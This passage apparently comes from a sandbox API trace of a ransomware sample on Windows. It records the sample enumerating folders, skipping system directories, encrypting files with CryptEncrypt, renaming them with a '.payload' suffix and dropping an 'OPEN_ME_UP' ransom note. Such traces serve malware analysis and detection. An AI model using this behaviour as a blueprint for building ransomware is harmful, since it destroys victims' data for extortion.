hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.233] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.233] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.233] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.233] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.233] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.233] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\..") returned 28 [0058.233] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.233] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.233] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1025", cAlternateFileName="")) returned 1 [0058.233] lstrcmpiW (lpString1="1025", lpString2="Windows") returned -1 [0058.233] lstrcmpiW (lpString1="1025", lpString2="$Recycle.bin") returned 1 [0058.233] lstrcmpiW (lpString1="1025", lpString2="System Volume Information") returned -1 [0058.233] lstrcmpiW (lpString1="1025", lpString2="Program Files") returned -1 [0058.233] lstrcmpiW (lpString1="1025", lpString2="Program Files (x86)") returned -1 [0058.233] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025") returned 30 [0058.233] lstrcmpW (lpString1="1025", lpString2=".") returned 1 [0058.233] lstrcmpW (lpString1="1025", lpString2="..") returned 1 [0058.233] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.233] GetProcessHeap () returned 0x5e0000 [0058.233] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.233] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\*") returned 32 [0058.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6063e0 [0058.234] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.234] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.234] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.234] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.234] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.234] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\.") returned 32 [0058.234] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.234] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.234] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.234] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.234] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.234] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.235] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.235] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\..") returned 33 [0058.235] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.235] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.235] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.235] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.235] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.235] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.235] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.235] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.235] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf") returned 39 [0058.235] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.235] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.235] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.235] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.235] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.236] GetTickCount () returned 0x114efff [0058.236] GetTickCount () returned 0x114efff [0058.236] GetTickCount () returned 0x114efff [0058.236] GetTickCount () returned 0x114efff [0058.236] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.237] GetProcessHeap () returned 0x5e0000 [0058.237] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.237] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x1d8f, lpOverlapped=0x0) returned 1 [0058.238] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffe271, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.238] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x1d8f, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x1d8f, lpOverlapped=0x0) returned 1 [0058.239] GetProcessHeap () returned 0x5e0000 [0058.239] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.239] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.239] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.239] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.239] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.239] CloseHandle (hObject=0x438) returned 1 [0058.322] GetProcessHeap () returned 0x5e0000 [0058.322] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.322] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.325] GetProcessHeap () returned 0x5e0000 [0058.325] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.325] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.325] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.326] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.326] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.326] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.326] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.326] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 48 [0058.326] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.326] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.326] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.326] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.326] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.326] GetTickCount () returned 0x114f05c [0058.326] GetTickCount () returned 0x114f05c [0058.326] GetTickCount () returned 0x114f05c [0058.326] GetTickCount () returned 0x114f05c [0058.327] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.327] GetProcessHeap () returned 0x5e0000 [0058.327] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.327] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.329] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.329] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.330] GetProcessHeap () returned 0x5e0000 [0058.330] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.330] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.330] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.330] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.330] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.330] CloseHandle (hObject=0x438) returned 1 [0058.332] GetProcessHeap () returned 0x5e0000 [0058.332] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.332] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.333] GetProcessHeap () returned 0x5e0000 [0058.333] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.333] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.333] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.333] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.333] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.333] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.333] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.333] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 49 [0058.333] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.333] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.333] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.333] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.333] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.334] GetTickCount () returned 0x114f06c [0058.334] GetTickCount () returned 0x114f06c [0058.334] GetTickCount () returned 0x114f06c [0058.334] GetTickCount () returned 0x114f06c [0058.334] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.334] GetProcessHeap () returned 0x5e0000 [0058.334] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.334] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.336] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.336] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.336] GetProcessHeap () returned 0x5e0000 [0058.336] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.336] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.336] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.337] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.337] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.337] CloseHandle (hObject=0x438) returned 1 [0058.338] GetProcessHeap () returned 0x5e0000 [0058.338] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.338] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.338] GetProcessHeap () returned 0x5e0000 [0058.338] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.338] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.338] FindClose (in: hFindFile=0x6063e0 | out: hFindFile=0x6063e0) returned 1 [0058.338] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1025\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.338] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1025\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.339] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.339] CloseHandle (hObject=0x430) returned 1 [0058.340] GetProcessHeap () returned 0x5e0000 [0058.340] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.340] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1028", cAlternateFileName="")) returned 1 [0058.340] lstrcmpiW (lpString1="1028", lpString2="Windows") returned -1 [0058.340] lstrcmpiW (lpString1="1028", lpString2="$Recycle.bin") returned 1 [0058.340] lstrcmpiW (lpString1="1028", lpString2="System Volume Information") returned -1 [0058.340] lstrcmpiW (lpString1="1028", lpString2="Program Files") returned -1 [0058.340] lstrcmpiW (lpString1="1028", lpString2="Program Files (x86)") returned -1 [0058.340] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028") returned 30 [0058.340] lstrcmpW (lpString1="1028", lpString2=".") returned 1 [0058.340] lstrcmpW (lpString1="1028", lpString2="..") returned 1 [0058.340] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.340] GetProcessHeap () returned 0x5e0000 [0058.340] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.340] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\*") returned 32 [0058.340] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606820 [0058.341] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.341] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.341] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.341] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.341] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.341] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\.") returned 32 [0058.341] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.341] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.341] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.341] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.341] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.341] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.341] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.341] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\..") returned 33 [0058.341] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.341] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.341] FindNextFileW (in: 